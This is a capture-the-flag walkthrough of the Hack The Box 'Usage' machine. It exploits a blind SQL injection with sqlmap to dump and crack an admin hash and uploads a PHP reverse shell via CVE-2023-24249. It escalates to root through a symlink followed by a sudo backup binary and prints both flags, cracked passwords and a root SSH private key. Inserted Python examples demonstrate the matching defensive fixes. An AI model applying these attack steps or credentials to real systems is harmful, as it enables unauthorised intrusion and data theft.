TCP Scan

> TARGET=10.10.11.18 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP Scan
> nmap -p- --min-rate=1000 -T4 10.10.11.18 -Pn -sU -vvv -oN nmap_udp_all.nmap
[x]
  • Add 10.10.11.18 usage.htb to /etc/hosts

tcp/80

  • The site links to admin.usage.htb
  • Register an account and log in
  • The session cookie is named laravel_session
  • Headers:
> curl -I http://usage.htb/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Cache-Control: no-cache, private
Date: Sun, 21 Apr 2024 22:37:22 GMT
Set-Cookie: XSRF-TOKEN=XSRF-TOKEN; expires=Mon, 22 Apr 2024 00:37:22 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: laravel_session=laravel_session; expires=Mon, 22 Apr 2024 00:37:22 GMT; Max-Age=7200; path=/; httponly; samesite=lax
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
  • dirsearch
> dirsearch -H "Cookie: XSRF-TOKEN=;laravel_session=cookie" -u http://usage.htb/ -x 503
[18:39:41] 403 -  564B  - /%2e%2e;/test
[18:39:58] 403 -  564B  - /admpar/.ftppass
[18:40:07] 200 -    6KB - /dashboard
[18:40:18] 403 -  564B  - /lib/flex/varien/.actionScriptProperties
[18:40:20] 302 -  334B  - /logout/  ->  http://usage.htb/login
[18:40:42] 403 -  564B  - /twitter/.env

> dirsearch -H "Cookie: laravel_session=cookie" -u http://usage.htb/ -x 503 -m POST
[18:16:16] 403 -  564B  - /%2e%2e;/test
[18:16:34] 403 -  564B  - /admrev/.ftppass
[18:16:54] 403 -  564B  - /lib/flex/varien/.flexLibProperties
[18:17:08] 405 -  568B  - /robots.txt

> dirsearch -H "Cookie: cookie" -u http://admin.usage.htb/ -x 503
[18:48:27] 403 -  564B  - /%2e%2e;/test
[18:48:49] 403 -  564B  - /bitrix/.settings
[18:49:05] 403 -  564B  - /lib/flex/varien/.flexLibProperties
[18:49:32] 403 -  564B  - /uploads/
[18:49:34] 403 -  564B  - /vendor/
  • Subdomain enumeration with wfuzz
> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://usage.htb/" -H "Host: FUZZ.usage.htb" --hh 178
000000024:   200        88 L     226 W      3304 Ch     "admin"
  • Testing http://usage.htb/forget-password showed a boolean-based blind SQL injection in the email parameter
> sqlmap -u http://usage.htb/forget-password -H "Cookie: cookies" --data '_token=<...>&email=test@test.com*' --level 5 --risk 3 --batch --dump --dbms mysql

[19:48:37] [INFO] fetching tables for database: 'usage_blog'
[19:48:37] [INFO] fetching number of tables for database 'usage_blog'
[19:48:37] [INFO] retrieved: 15
[19:48:38] [INFO] retrieved: admin_menu
[19:48:55] [INFO] retrieved: admin_operation_log
[19:49:18] [INFO] retrieved: admin_permissions
[19:49:37] [INFO] retrieved: admin_role_menu
[19:49:55] [INFO] retrieved: admin_role_permissions
[19:50:16] [INFO] retrieved: admin_role_users
[19:50:28] [INFO] retrieved: admin_roles
[19:50:34] [INFO] retrieved: admin_user_permissions
[19:51:01] [INFO] retrieved: admin_users
[19:51:05] [INFO] retrieved: blog
[19:51:11] [INFO] retrieved: failed_jobs
[19:51:26] [INFO] retrieved: migrations
[19:51:39] [INFO] retrieved: password_reset_tokens
[19:52:11] [INFO] retrieved: personal_access_tokens
[19:52:43] [INFO] retrieved: users

> sqlmap -u http://usage.htb/forget-password -H "Cookie: cookies" --data '_token=<...>&email=test@test.com*' --level 5 --risk 3 --batch --dump --dbms mysql -T admin_users

Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| id | name          | avatar  | password                                                     | username | created_at          | updated_at          | remember_token                                               |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| 1  | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin    | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmPpxwEkzv1Sdzva0qLYaDhllwrsLT |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
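The injection above is the classic pattern of user input being concatenated into a query. The following is an added example, not code from the writeup or from the usage.htb application: it puts the vulnerable string-built lookup next to the parameterized form and shows the true/false differential a boolean-based probe relies on. An in-memory SQLite database stands in for the usage_blog MySQL database; the table, rows, and function names are constructed for the demo. Laravel's query builder binds values for you, so this defect appears when input is spliced into raw SQL.

```python
"""
Added example: vulnerable vs parameterized email lookup (SQLite stand-in).
"""
import sqlite3


def make_db():
    """Constructed sample database: two users, nothing from the real target."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    conn.execute(
        "INSERT INTO users (email) VALUES ('alice@example.com'), ('bob@example.com')"
    )
    return conn


def lookup_vulnerable(conn, email):
    """String interpolation: any quote inside `email` becomes part of the SQL."""
    sql = f"SELECT id FROM users WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, email):
    """Bound parameter: the value is passed to the engine separately and is
    never parsed as SQL, so quotes in it are just characters."""
    return [
        row[0]
        for row in conn.execute("SELECT id FROM users WHERE email = ?", (email,))
    ]


def boolean_probe_differs(lookup, conn):
    """The signal a boolean-based check looks for: does appending a tautology
    versus a contradiction to an unknown address change the result?
    For a parameterized lookup both probes return the same (empty) result."""
    true_case = lookup(conn, "nobody@example.com' OR '1'='1")
    false_case = lookup(conn, "nobody@example.com' OR '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    print("vulnerable differential:", boolean_probe_differs(lookup_vulnerable, db))
    print("parameterized differential:", boolean_probe_differs(lookup_safe, db))
```

The vulnerable lookup returns every row for the tautology and nothing for the contradiction; the parameterized one returns an empty list for both, which is exactly why a tool like sqlmap finds nothing to work with against it.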
  • Crack the hash using john
> john -w=/usr/share/wordlists/rockyou.txt hash
`whatever1`

http://admin.usage.htb/

  • Log in to http://admin.usage.htb/ with the credentials above
  • Found the following log entry, but it is not very useful: $2y$10$E9.N1P92fYSjJGQDfBrUaO05EHW4BxiQITrqjde/WQMKnAQ7k2HJK:admin
  • The panel runs encore/laravel-admin 1.8.18, which is affected by CVE-2023-24249: https://flyd.uk/post/cve-2023-24249/
  • Prepare a reverse shell: /usr/share/webshells/php/php-reverse-shell.php
  • Rename it to .jpg and upload it, then intercept the request and change the extension back to .php in the submit action.
  • Browse to the uploaded file (here http://admin.usage.htb/uploads/images/w.php) to trigger the reverse shell
$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
$ cat user.txt
0821865575c6b0dcfe188b2caec7fc8a
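The upload step works because the application trusts the filename it receives after the client-side check has already passed. Below is an added example of a server-side validator, not code from the writeup and not laravel-admin's own code: the client filename is only consulted for its extension, that extension must agree with the magic bytes actually sent, image/PHP polyglots are rejected, and the stored name is chosen by the server from the verified bytes, so an extension swapped in transit (w.jpg to w.php) changes nothing. The function names and sample payloads are constructed for the demo.

```python
"""
Added example: server-side image upload validation that ignores the client's
choice of stored filename.
"""
import os

# Allowlisted image types: canonical extension -> accepted magic-byte prefixes.
IMAGE_SIGNATURES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# PHP open tags that must never appear inside an "image".
PHP_TAGS = (b"<?php", b"<?=")


def detect_image_type(content):
    """Return the canonical extension whose signature matches, or None."""
    for ext, sigs in IMAGE_SIGNATURES.items():
        if any(content.startswith(sig) for sig in sigs):
            return ext
    return None


def validate_upload(client_filename, content):
    """Return (accepted, reason). Order matters: the cheapest checks run first."""
    base = os.path.basename(client_filename)
    name, ext = os.path.splitext(base)
    ext = {".jpeg": ".jpg"}.get(ext.lower(), ext.lower())
    if ext not in IMAGE_SIGNATURES:
        return False, "extension not in allowlist"
    if "." in name:
        return False, "double extension"  # rejects shell.php.jpg-style names
    if detect_image_type(content) != ext:
        return False, "content does not match declared type"
    if any(tag in content for tag in PHP_TAGS):
        return False, "embedded PHP tag"  # catches image/PHP polyglots
    return True, "ok"


def storage_name(content, token):
    """Server-chosen filename: a random token (caller supplies it, e.g.
    secrets.token_hex(8)) plus the extension derived from the verified bytes.
    The client's filename never reaches the filesystem."""
    detected = detect_image_type(content)
    if detected is None:
        raise ValueError("not an allowlisted image")
    return token + detected


if __name__ == "__main__":
    import secrets
    sample_jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32  # constructed JPEG header
    print(validate_upload("photo.jpg", sample_jpeg))
    print(validate_upload("w.php", sample_jpeg))
    print(storage_name(sample_jpeg, secrets.token_hex(8)))
```

Pair this with a web-server rule that never executes files under the upload directory; the validator stops the rename trick, the server rule limits the damage if some other path writes into /uploads.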
  • Upload linpeas and run it
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1269/nginx: worker
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:2812          0.0.0.0:*               LISTEN      1648/monit
tcp6       0      0 :::22                   :::*                    LISTEN      -

/home/dash/snap/lxd/common/config/config.yml
/home/dash/.monit.state
/home/dash/p.sh
/home/dash/.gnupg/crls.d/DIR.txt
/home/dash/.gnupg/pubring.kbx
/home/dash/.gnupg/trustdb.gpg
/home/dash/user.txt
/home/dash/.monit.pid

[+] Searching specific hashes inside files - less false positives (limit 70)
/var/www/html/project_admin/vendor/encore/laravel-admin/tests/seeds/factory.php:$2y$10$U2WSLymU6eKJclK06glaF.Gj3Sw/ieDE3n7mJYjKEgDh4nzUiSESO
/var/www/html/project_admin/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi
/var/www/html/usage_blog/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi
  • Forward port 2812; it serves a page that requires basic auth
> ssh -L 2812:10.10.11.18:2812 -i dash_id_rsa dash@usage.htb
  • Found the admin password for the forwarded page in plaintext in dash's .monitrc
dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd

#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
    if cpu > 80% for 2 cycles then alert


#System Monitoring
check system usage
    if memory usage > 80% for 2 cycles then alert
    if cpu usage (user) > 70% for 2 cycles then alert
        if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert
    if loadavg (1min) > 6 for 2 cycles then alert
    if loadavg (5min) > 4 for 2 cycles then alert
    if swap usage > 5% then alert

check filesystem rootfs with path /
       if space usage > 80% then alert
  • There is another user called xander; the same password works for that account
> su xander
  • Check sudo rights
xander@usage:/home/dash$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management
  • The binary backs up the project files under /var/www/html
xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54874298

Scanning the drive:
3185 folders, 18035 files, 132313316 bytes (127 MiB)

Updating archive: /var/backups/project.zip

Items to compress: 21220


Files read from disk: 18035
Archive size: 72305397 bytes (69 MiB)
Everything is Ok
  • So a symlink to /root placed under /var/www/html gets its contents included in the backup
# as dash
> ln -s /root /var/www/html/rootfs
  • Run the backup again and then grab the zip file to find the root flag
2f70b84cf7e1d124052bc33950f1ca90

Reference: https://www.dotnetperls.com/7-zip-examples lists the -snl switch ("store symbolic links as links"). Without it 7-Zip follows the link and archives the target's contents, which is why a backup run as root pulls in /root.
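The privilege escalation above comes down to a privileged backup that follows symbolic links out of the directory it was told to archive. The following is an added example, not the usage_management binary or the writeup's code: a naive archiver that follows links (the 7z-without--snl behaviour) next to one that refuses to descend into or read through a link and rejects anything whose real path escapes the backup root. It runs on a constructed temporary tree containing a link that points outside the root, mirroring the rootfs symlink; all paths, names and file contents are constructed for the demo.

```python
"""
Added example: symlink-following vs symlink-aware backup of a directory tree.
"""
import os
import tempfile
import zipfile


def archive_naive(src_root, zip_path):
    """Follows symlinks while walking and reads through them when writing,
    so a link to /root inside the tree drags /root's files into the archive."""
    with zipfile.ZipFile(zip_path, "w") as zf:
        for dirpath, _dirnames, filenames in os.walk(src_root, followlinks=True):
            for name in filenames:
                full = os.path.join(dirpath, name)
                zf.write(full, os.path.relpath(full, src_root))


def archive_safe(src_root, zip_path):
    """Never follows a link: linked directories are pruned from the walk,
    linked files are skipped, and any path whose resolved location lies outside
    src_root is refused. Returns the list of skipped relative paths."""
    root_real = os.path.realpath(src_root)
    skipped = []
    with zipfile.ZipFile(zip_path, "w") as zf:
        for dirpath, dirnames, filenames in os.walk(src_root, followlinks=False):
            # os.walk still lists symlinked directories in dirnames; prune them.
            for d in list(dirnames):
                if os.path.islink(os.path.join(dirpath, d)):
                    skipped.append(os.path.relpath(os.path.join(dirpath, d), src_root))
                    dirnames.remove(d)
            for name in filenames:
                full = os.path.join(dirpath, name)
                inside = os.path.realpath(full).startswith(root_real + os.sep)
                if os.path.islink(full) or not inside:
                    skipped.append(os.path.relpath(full, src_root))
                    continue
                zf.write(full, os.path.relpath(full, src_root))
    return skipped


def archive_names(zip_path):
    with zipfile.ZipFile(zip_path) as zf:
        return sorted(zf.namelist())


def demo():
    """Build <tmp>/outside/root.txt and <tmp>/html/{index.html, rootfs -> ../outside},
    archive <tmp>/html both ways, and return (naive names, safe names, skipped)."""
    tmp = tempfile.mkdtemp()
    outside = os.path.join(tmp, "outside")
    html = os.path.join(tmp, "html")
    os.makedirs(outside)
    os.makedirs(html)
    with open(os.path.join(outside, "root.txt"), "w") as f:
        f.write("FLAG-PLACEHOLDER\n")  # constructed stand-in for a file outside the root
    with open(os.path.join(html, "index.html"), "w") as f:
        f.write("<h1>hi</h1>\n")
    os.symlink(outside, os.path.join(html, "rootfs"))  # mirrors: ln -s /root /var/www/html/rootfs
    naive_zip = os.path.join(tmp, "naive.zip")
    safe_zip = os.path.join(tmp, "safe.zip")
    archive_naive(html, naive_zip)
    skipped = archive_safe(html, safe_zip)
    return archive_names(naive_zip), archive_names(safe_zip), skipped


if __name__ == "__main__":
    naive, safe, skipped = demo()
    print("naive archive:", naive)
    print("safe archive: ", safe, "skipped:", skipped)
```

The realpath containment check is the part that matters even when links are stored rather than followed: it also stops a hard link or a bind mount from smuggling content in, and it is the check to look for when reviewing any backup or sync job that runs as root over a directory that less privileged users can write to.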

dash_id_rsa


root_id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM=
-----END OPENSSH PRIVATE KEY-----

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack